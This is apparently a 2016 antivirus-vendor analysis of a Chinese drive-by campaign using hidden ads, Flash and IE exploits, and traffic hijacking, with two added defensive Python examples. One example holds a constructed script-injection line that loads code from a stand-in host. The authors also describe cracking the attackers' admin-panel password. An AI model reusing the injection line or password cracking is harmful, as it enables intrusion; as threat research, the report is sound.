Tencent PC Manager · 2016/03/15 20:57

0x00 Origin


Since March 5, Tencent Anti-Virus Lab has observed abnormal virus-download traffic coming from a large number of well-known software clients, indicating that those clients might be under a large-scale drive-by ("horse-hanging", 挂马) attack. PC Manager carried out an emergency investigation of the relevant data and eventually found that this was a large-scale network attack that combined several factors: inadequate monitoring by carriers, lax vetting by advertising networks, and security vulnerabilities in client software. As many as three attack methods were used (see below).

0x01 Analysis Process


1. Attack Method 1 (a carrier's client): drive-by through a commercial advertisement

From the data we found that one of the largest distribution channels was the Speedup module of a carrier's client software. The PC Manager engineers' first questions: is a new 0-day being exploited? Is a regional carrier hijacking traffic?

Based on the IP addresses of some affected users, all of them belonged to the same carrier and were widely distributed rather than concentrated in one region.

We installed the software in a simulated environment; after installation it launched the Speedup module as normal.

Speedup.exe embeds an IE control but never shows the corresponding window. A hidden advertisement?

Forcing the window to display with a tool shows what looks like a normal game ad.

Further analysis shows that the server address for the ad link is hard-coded in speedup.exe. Every few minutes the built-in browser fetches the ad URL and renders the ad in memory. Because the ad window is hidden, the user is completely unaware that the ad exists.

Following this lead, we kept capturing and analysing packets and finally found that the ad visits a suspicious page: HXXP://www.ip.u****.com.cn/index.html. Visited directly, the page appears to be a normal Flash ad for a game.

Reviewing the page's source code, two of the resources it loads caught our attention:

(1) HXXP://www.ip.u****.com.cn/lSQza.swf

Decompiling it, we found that lSQza.swf is protected with a doSWF shell.

The real malicious SWF was recovered from a memory dump.

Decompiling and analysing that code showed that the Trojan exploits CVE-2015-5122.

The main function of the payload that the exploit finally loads is to download silence_eq014.exe and execute it.
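As an added example that is not part of the original analysis, the following Python routine carves SWF files out of a raw memory dump in the way the step above describes: every candidate header's version byte and declared length are validated so that stray "FWS"/"CWS" byte runs are not reported, and zlib-packed (CWS) bodies are inflated for inspection. The dump, the packed "shell" SWF and the inner SWF are constructed samples.

```python
import re
import struct
import zlib

# SWF header: signature (FWS plain, CWS zlib, ZWS LZMA), version, LE32 length incl. header.
SWF_HEADER = struct.Struct("<3sBI")
SWF_MAGIC = re.compile(rb"[FCZ]WS")

def carve_swf(dump: bytes, max_version: int = 40) -> list:
    """Return plausible SWFs at any offset of a raw memory dump (ZWS: header only)."""
    hits = []
    for m in SWF_MAGIC.finditer(dump):
        off = m.start()
        if off + SWF_HEADER.size > len(dump):
            continue
        sig, version, length = SWF_HEADER.unpack_from(dump, off)
        # Skip runs that only look like a signature (bad version or length).
        if not 1 <= version <= max_version or length < SWF_HEADER.size:
            continue
        if sig == b"FWS":
            if off + length > len(dump):
                continue
            body = dump[off + 8:off + length]
        elif sig == b"CWS":
            try:  # decompressobj stops at stream end; trailing dump bytes are ignored
                body = zlib.decompressobj().decompress(dump[off + 8:])
            except zlib.error:
                continue
            if len(body) != length - SWF_HEADER.size:
                continue
        else:
            body = None
        hits.append({"offset": off, "signature": sig.decode(), "version": version,
                     "length": length, "body": body})
    return hits

def build_swf(sig: bytes, version: int, body: bytes) -> bytes:
    """Fabricate a test SWF (constructed sample, not real malware)."""
    payload = zlib.compress(body) if sig == b"CWS" else body
    return SWF_HEADER.pack(sig, version, SWF_HEADER.size + len(body)) + payload

# Constructed dump: zlib-packed "shell" SWF, noise, a decoy "FWS" run with an
# impossible version byte (must be skipped), then a plain inner SWF.
FAKE_HEADER = b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x18\x01\x00"
SHELL_BODY = FAKE_HEADER + b"shell-tags" * 4
INNER_BODY = FAKE_HEADER + b"inner-tags" * 4
SAMPLE_DUMP = (b"\x00" * 16 + build_swf(b"CWS", 22, SHELL_BODY) + b"\xff" * 9
               + b"FWS\xff\x10\x00\x00\x00" + b"A" * 7
               + build_swf(b"FWS", 11, INNER_BODY) + b"\x00" * 5)
```

The inflated body of each hit can then be written to disk and fed to a decompiler, which is the point at which the analysis above identifies the exploit.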

CVE-2015-5122 technical details: www.cvedetails.com/cve/2015-51…

(2) HXXP://www.ip.u****.com.cn/gxrp.html

The content of gxrp.html is an encoded script.

After decoding, it turns out to be exploit code for the well-known IE vulnerability CVE-2014-6332.

The payload that this exploit finally loads also downloads and executes silence_eq014.exe.

Note that the patch Microsoft issued for CVE-2014-6332 does not cover XP, so XP users hit by this exploit are easily compromised unless protected by security software. CVE-2014-6332 technical details: www.cvedetails.com/cve/2014-63…

The ad page uses both vulnerabilities at once to raise the success rate of the drive-by. Both exploits have the same end goal: trigger the download of the Trojan installer from HXXP://download.xin*****rj.cn/download/silence_eq014.exe

The link remains valid when "014" in the address is replaced with any string from "001" to "013", so the silence_eq virus is evidently spread through channels other than advertising as well.

To evade antivirus interception as far as possible, the silence_eq family is repacked automatically and at high frequency: a new variant appears roughly every 10 seconds. According to statistics from the known channels, as many as 120,000 variants can appear within 24 hours.

(3) Analysis of the silence_eq Trojan

This is an ordinary download Trojan with a simple purpose: pull the installers of the promoted software from a download list and execute them.

Analysis leads to the download list: HXXP://115******30.228:8090/1.txt

It contains a number of software download addresses.

Visiting HXXP://115******30.28:8090 directly, the page title is "Statistics Backend Management", presumably a panel that counts installs of the promoted software.

We cracked the password using "technical means" and logged in. By 17:00 on March 12 the infection count had exceeded 2 million, and the true number is probably far higher, since the statistics can be cleared.

2. Attack Method 2 (a game): targeted hijacking of specific content

We found a player affected by the problem, captured packets and monitored programs on the machine, and finally found that the normal request for http://im****he.gtimg.cn/*****_v1/tvp/js/tvp.player_v2_jq.js was being hijacked.

The hijacked JS code is as follows. It first downloads the normal tvp.player_v2_jq.js, and then finally pulls http://im****he.gtimg.cn/*****_v1/tvp/js/tvp.player_v2_jq.js

HXXP://home.b*****dn2.com/06/main.js downloads further JS.

Tracing layer by layer, we located the key drive-by page: HXXP://www.m****u.cn/1/index001.html

Does the exploit file that is finally triggered, "lsqza.swf", look familiar? It has the same name as the malicious SWF in attack method 1, so this is clearly the same gang.

The subsequent exploitation differs slightly from method 1: only the CVE-2015-5112 Flash vulnerability is used. After a successful exploit it drops and runs a download Trojan named deskhomepage_179_1.exe.

Ultimately a large number of promotion programs are installed, which harass the user with ad pop-ups.

Users can clean up the promotion software with PC Manager's antivirus function.

3. Attack Method 3: random insertion of the drive-by ad page into any web page

The method is essentially the same as method 2, but instead of hijacking specific content, the attacker randomly inserts the drive-by ad page into the data returned for network requests. Any web access initiated by any client software can be contaminated, especially when the user runs an unpatched system or software with a Flash vulnerability, such as a browser. The final drive-by page seen for this attack method is the same as in attack method 2.
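As an added example (not code from the original report), here is a Python check of the kind a client or monitoring system could apply to static scripts such as the player JS in attack methods 2 and 3: with a known-good copy it isolates the bytes appended by the hijack; without one it flags loader constructs that point at hosts outside an allowlist. The sample script, the hostnames and the allowlist are all constructed placeholders.

```python
import hashlib
import re
from typing import Optional

# Loader constructs an injected tail relies on to pull the next stage.
LOADER_PATTERNS = [
    re.compile(rb"document\.write\s*\(", re.I),
    re.compile(rb"<\s*(?:script|iframe)\b", re.I),
    re.compile(rb"createElement\s*\(\s*['\"](?:script|iframe)['\"]", re.I),
]
URL_HOST = re.compile(rb"https?://([A-Za-z0-9.\-]+)", re.I)

def check_static_resource(body: bytes, allowed_hosts, known_good: Optional[bytes] = None) -> dict:
    """Classify a fetched script that should be byte-identical on every request.

    With a known-good copy, any difference is tampering and the injected tail
    is isolated; without one, loader patterns pointing at hosts outside
    allowed_hosts make the body suspicious.
    """
    result = {"sha256": hashlib.sha256(body).hexdigest(), "verdict": "clean",
              "injected_tail": b"", "foreign_hosts": []}
    scan = body
    if known_good is not None:
        if body == known_good:
            return result
        # The hijack described above keeps the original bytes and appends to
        # them, so the divergence point is the length of the common prefix.
        prefix = 0
        while prefix < min(len(body), len(known_good)) and body[prefix] == known_good[prefix]:
            prefix += 1
        result["verdict"] = "tampered"
        result["injected_tail"] = scan = body[prefix:]
    loader_hits = sum(len(p.findall(scan)) for p in LOADER_PATTERNS)
    hosts = {h.decode().lower() for h in URL_HOST.findall(scan)}
    result["foreign_hosts"] = sorted(hosts - set(allowed_hosts))
    if result["verdict"] == "clean" and loader_hits and result["foreign_hosts"]:
        result["verdict"] = "suspicious"
    return result

# Constructed samples; the hostnames are placeholders, not the real ones.
CDN_HOSTS = {"cdn.example"}
LEGIT_JS = b"(function(){window.tvp=window.tvp||{};tvp.play=function(id){};})();\n"
INJECTED_JS = LEGIT_JS + (b"document.write('<script src=\"http://stage2.invalid/06/main.js\">"
                          b"</script>');\n")
```

A hash mismatch on a resource that is supposed to be static is the strongest signal here; the pattern scan is only a fallback for resources whose good copy is not pinned.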

0x02 Data Monitoring


In the early stage of the attack, targeted hijacking of a game's data (attack method 2) was the main mode, affecting users of one carrier. Since March 9, the drive-by gang has used drive-by through commercial advertising (attack method 1) to step up the attack on users of another carrier nationwide.

Henan province has been the most affected.

The silence_eq Trojan and a ransomware Trojan target users of certain carriers, and the affected users are not clustered geographically.

0x03 Summary and Suggestions


The scale of this attack, which involved two major carriers and several well-known software products, is rarely seen in the history of the Chinese Internet, and users in Henan province were affected most. As of March 14, some of the download sites involved were still active and still updating their data.

Tencent Anti-Virus Lab believes these three attacks hit the current security weaknesses of every party on the Chinese Internet:

(1) When providing Internet data services, carriers should first ensure the security of that data. Better monitoring should be established over the data served by their nodes to avoid large-scale hijacking of network content in some regions. PC Manager has contacted the carrier and provided further details to help it locate the problem and develop follow-up preventive measures.

(2) Besides protecting user data, legitimate software vendors should pay more attention to the security of communication between client and server: for example, replace HTTP, which is easily tampered with, by HTTPS. Update components with known security risks, especially the Flash components attackers use so often. Early on, attackers tended to go after browsers with vulnerable Flash components; now that browser vendors have paid attention and actively upgrade Flash, client software whose defenses lag behind has become the focus of attacks.

(3) Advertising networks should strengthen security vetting of all kinds of advertisements, especially Flash ads, which are easily abused, so that they are not turned into a Trojan distribution platform by attackers.

(4) Users should use security software and install the latest system patches. Windows XP users are advised to upgrade to Windows 7 or 10 as soon as possible, since Microsoft no longer provides bug fixes for Windows XP.